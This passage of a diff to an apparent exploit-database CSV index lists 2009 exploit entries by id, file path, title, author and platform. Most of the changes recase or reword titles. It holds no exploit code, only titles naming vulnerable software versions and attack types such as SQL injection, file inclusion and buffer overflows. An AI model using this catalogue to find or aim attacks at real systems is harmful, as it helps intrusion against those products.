7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect Insecure Cookie Handling Vuln",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-02-03,R3d-D3v!L,php,webapps,0 -7954,platforms/php/webapps/7954.txt,"Groone GLinks 2.1 Remote File Inclusion Vulnerability",2009-02-03,"k3vin mitnick",php,webapps,0 -7955,platforms/php/webapps/7955.txt,"Groone's Guestbook 2.0 Remote File Inclusion Vulnerability",2009-02-03,"k3vin mitnick",php,webapps,0 +7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion Vulnerability",2009-02-03,"k3vin mitnick",php,webapps,0 +7955,platforms/php/webapps/7955.txt,"groone's guestbook 2.0 - Remote File Inclusion Vulnerability",2009-02-03,"k3vin mitnick",php,webapps,0 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,x0r,php,webapps,0 7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0 @@ -7494,26 +7494,26 @@ id,file,description,date,author,platform,type,port 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS <= 2.6 Multiple Remote SQL Injection Vulnerabilities",2009-02-03,D.Mortalov,php,webapps,0 -7965,platforms/php/webapps/7965.txt,"Technote 7.2 Remote File Inclusion Vulnerability",2009-02-03,make0day,php,webapps,0 -7966,platforms/windows/remote/7966.txt,"NaviCopa webserver 3.0.1 (BOF/SD) Multiple Remote Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 +7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion Vulnerability",2009-02-03,make0day,php,webapps,0 +7966,platforms/windows/remote/7966.txt,"navicopa webserver 3.0.1 (bof/sd) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha Remote Command Execution Exploit",2009-02-03,Osirys,php,webapps,0 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0 -7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 Remote File Inclusion Vulnerability",2009-02-03,"Alfons Luja",php,webapps,0 +7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion Vulnerability",2009-02-03,"Alfons Luja",php,webapps,0 7972,platforms/php/webapps/7972.py,"Openfiler 2.3 (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)",2009-02-04,"Single Eye",windows,local,0 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability",2009-02-04,ahmadbady,php,webapps,0 -7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Remote Vulnerabilities",2009-02-04,make0day,php,webapps,0 +7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 Multiple Remote File Inclusion Vulnerabilities",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management (DD/XSS) Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 -7982,platforms/asp/webapps/7982.txt,"Team 1.x (DD/XSS) Multiple Remote Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 +7982,platforms/asp/webapps/7982.txt,"team 1.x (dd/xss) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 (Authorization) Stack BOF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 -7987,platforms/php/webapps/7987.txt,"GR Blog 1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities",2009-02-04,JosS,php,webapps,0 +7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 (upload/bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista)",2009-02-04,"Rob Carter",windows,remote,0 7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC",2009-02-04,"Andres Luksenberg",windows,dos,0 @@ -7526,28 +7526,28 @@ id,file,description,date,author,platform,type,port 7997,platforms/php/webapps/7997.htm,"txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 Remote PHP File Upload Vulnerability",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 -8000,platforms/php/webapps/8000.txt,"ZeroBoard4 pl8 (07.12.17) Multiple Remote Vulnerabilities",2009-02-06,make0day,php,webapps,0 +8000,platforms/php/webapps/8000.txt,"zeroboard4 pl8 (07.12.17) Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine (index.php catid) Remote SQL Injection Vulnerability",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 (Azione) Remote File Inclusion Vulnerability",2009-02-06,Arka69,php,webapps,0 -8006,platforms/php/webapps/8006.txt,"Traidnt UP Version 1.0 Remote File Upload Vulnerability",2009-02-09,fantastic,php,webapps,0 +8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload Vulnerability",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DOS Vulnerability",2009-02-09,Rembrandt,hardware,dos,0 -8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Remote Vulnerabilities Exploit",2009-02-09,DNX,php,webapps,0 +8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Vulnerabilities exploit",2009-02-09,DNX,php,webapps,0 8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 (JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 -8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 (XSS/RFI) Multiple Remote Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 +8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 (xss/rfi) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2,2,2 (RFI/XSS) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8018,platforms/php/webapps/8018.txt,"FlexCMS (catId) Remote SQL Injection Vulnerability",2009-02-09,MisterRichard,php,webapps,0 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) XSS Vulnerability",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC <= 0.1.0 Local File Inclusion Vulnerability",2009-02-09,Kacper,php,webapps,0 -8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 +8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass",2009-02-09,ikki,hardware,remote,0 8023,platforms/hardware/remote/8023.txt,"ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability",2009-02-09,ikki,hardware,remote,0 8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 @@ -7568,14 +7568,14 @@ id,file,description,date,author,platform,type,port 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln",2009-02-11,"Dejan Levaja",windows,remote,0 -8042,platforms/php/webapps/8042.txt,"Dacio's CMS 1.08 (XSS/SQL/DD) Multiple Remote Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 +8042,platforms/php/webapps/8042.txt,"dacio's cms 1.08 (xss/sql/dd) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01(searchmatch.php) SQL Injection Vulnerability",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 (viewer.php id) SQL Injection Vuln",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 Auth Bypass / SQL Injection Vulnerability",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns",2009-02-12,"Aria-Security Team",asp,webapps,0 -8049,platforms/php/webapps/8049.txt,"IdeaCart 0.02 (LFI/SQL) Multiple Remote Vulnerabilities",2009-02-13,nuclear,php,webapps,0 +8049,platforms/php/webapps/8049.txt,"ideacart 0.02 (lfi/sql) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 (id) Remote SQL Injection Vulnerability",2009-02-13,JiKo,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 Remote Command Execution with RFI (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 @@ -7587,13 +7587,13 @@ id,file,description,date,author,platform,type,port 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 8061,platforms/php/webapps/8061.pl,"simplePMS CMS <= 0.1.4 LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 -8062,platforms/php/webapps/8062.txt,"PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 -8063,platforms/php/webapps/8063.txt,"NovaBoard 1.0.0 Multiple Remote Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 +8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/xss) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 +8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln",2009-02-16,DarkB0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability",2009-02-16,ahmadbady,php,webapps,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 -8068,platforms/php/webapps/8068.txt,"RavenNuke 2.3.0 Multiple Remote Vulnerabilities",2009-02-16,waraxe,php,webapps,0 +8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 8069,platforms/php/webapps/8069.txt,"Grestul 1.x Auth Bypass by Cookie SQL Injection Vulnerability",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System Remote Shell Upload Vulnerability",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns",2009-02-17,x0r,php,webapps,0 @@ -7627,7 +7627,7 @@ id,file,description,date,author,platform,type,port 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-24,Fireshot,php,webapps,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) Remote SQL Injection Vulnerability",2009-02-24,b3,php,webapps,0 -8105,platforms/php/webapps/8105.txt,"pPIM 1.0 Multiple Remote Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 +8105,platforms/php/webapps/8105.txt,"ppim 1.0 Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service Vuln",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple MACOS X xnu <= 1228.x Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 @@ -7643,11 +7643,11 @@ id,file,description,date,author,platform,type,port 8118,platforms/windows/remote/8118.html,"Orbit <= 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change Vuln",2009-02-27,ByALBAYX,asp,webapps,0 8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - (.HEX File) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 -8123,platforms/php/webapps/8123.txt,"Irokez BLog 0.7.3.2 (XSS/RFI/BSQL) Multiple Remote Vulnerabilities",2009-02-27,Corwin,php,webapps,0 +8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 (xss/rfi/bsql) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch vCard over IP Denial of Service Exploit",2009-03-02,"Mobile Security Lab",hardware,dos,0 8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 m3u File Local Buffer Overflow Exploit (SEH)",2009-03-02,Encrypt3d.M!nd,windows,local,0 -8127,platforms/php/webapps/8127.txt,"BlogMan 0.45 Multiple Remote Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 +8127,platforms/php/webapps/8127.txt,"blogman 0.45 Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BOF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 @@ -7658,13 +7658,13 @@ id,file,description,date,author,platform,type,port 8135,platforms/windows/dos/8135.pl,"Media Commands (M3U,M3l,TXT,LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer Code Execution Vulnerability",2009-03-02,"Juan Galiana Lara",php,webapps,0 8137,platforms/windows/local/8137.py,"Media Commands (m3u File) Local SEH Overwrite Exploit",2009-03-02,His0k4,windows,local,0 -8138,platforms/windows/local/8138.c,"VUplayer 2.49 .CUE File Local Buffer Overflow Exploit",2009-03-02,"Assed Edin",windows,local,0 -8139,platforms/php/webapps/8139.txt,"RitsBlog 0.4.2 (AB/XSS) Multiple Remote Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 +8138,platforms/windows/local/8138.c,"VUplayer 2.49 - .CUE File Local Buffer Overflow Exploit",2009-03-02,"Assed Edin",windows,local,0 +8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 (ab/xss) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 -8141,platforms/php/webapps/8141.txt,"BlindBlog 1.3.1 (SQL/AB/LFI) Multiple Remote Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 +8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 (sql/ab/lfi) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server Authentication Request BOF Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 -8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 +8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit",2009-03-03,"Praveen Darshanam",multiple,dos,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 @@ -7677,17 +7677,17 @@ id,file,description,date,author,platform,type,port 8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0 8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0 -8161,platforms/php/webapps/8161.txt,"CelerBB 0.0.2 Multiple Remote Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 +8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8162,platforms/windows/local/8162.py,"Media Commands (m3u File) Universal SEH Overwrite Exploit",2009-03-05,His0k4,windows,local,0 -8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() Local Denial of Service Exploit",2009-03-05,SecurityReason,bsd,dos,0 +8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service Exploit",2009-03-05,SecurityReason,bsd,dos,0 8164,platforms/php/webapps/8164.php,"Joomla com_ijoomla_archive Blind SQL Injection Exploit",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability",2009-03-06,ka0x,php,webapps,0 -8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0 +8166,platforms/php/webapps/8166.txt,"wili-cms 0.4.0 (rfi/lfi/ab) Multiple Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - (praises.php id) Remote SQL Injection Vulnerability",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 Multiple Remote SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 -8172,platforms/php/webapps/8172.txt,"CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability",2009-03-09,cr0w,php,webapps,0 +8172,platforms/php/webapps/8172.txt,"cms s.builder <= 3.7 - Remote File Inclusion Vulnerability",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 @@ -7698,7 +7698,7 @@ id,file,description,date,author,platform,type,port 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability",2009-03-09,d3b4g,php,webapps,0 -8183,platforms/php/webapps/8183.txt,"Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 +8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability",2009-03-09,elusiven,php,webapps,0 @@ -7715,9 +7715,9 @@ id,file,description,date,author,platform,type,port 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning <= 1.6 (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 -8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 (Cookie) Add Extension By Pass Exploit",2009-03-11,SP4rT,php,webapps,0 +8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 -8204,platforms/php/webapps/8204.txt,"PhpMySport 1.4 (XSS/SQL) Multiple Remote Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 +8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 (xss/sql) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 Remote Integer Overflow PoC",2009-03-12,n3tpr0b3,linux,dos,0 8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 (index.php page) Local File Inclusion Vulnerability",2009-03-13,Alkindiii,php,webapps,0 @@ -7730,7 +7730,7 @@ id,file,description,date,author,platform,type,port 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive <= 1.9.21 (/LoadModule) URI Handlers Argument Injection Vuln",2009-03-16,Nine:Situations:Group,windows,remote,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 RFI/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 -8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 Blind SQL Injection/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 +8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,SkyLined,multiple,dos,0 8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 (entry_id) SQL Injection Vulnerability",2009-03-16,boom3rang,php,webapps,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 Local Heap Overflow PoC",2009-03-16,Stack,windows,dos,0 @@ -7746,13 +7746,13 @@ id,file,description,date,author,platform,type,port 8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2",2009-03-18,Encrypt3d.M!nd,windows,local,0 8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit",2009-03-18,Encrypt3d.M!nd,windows,local,0 8236,platforms/windows/local/8236.py,"Icarus 2.0 (.PGN 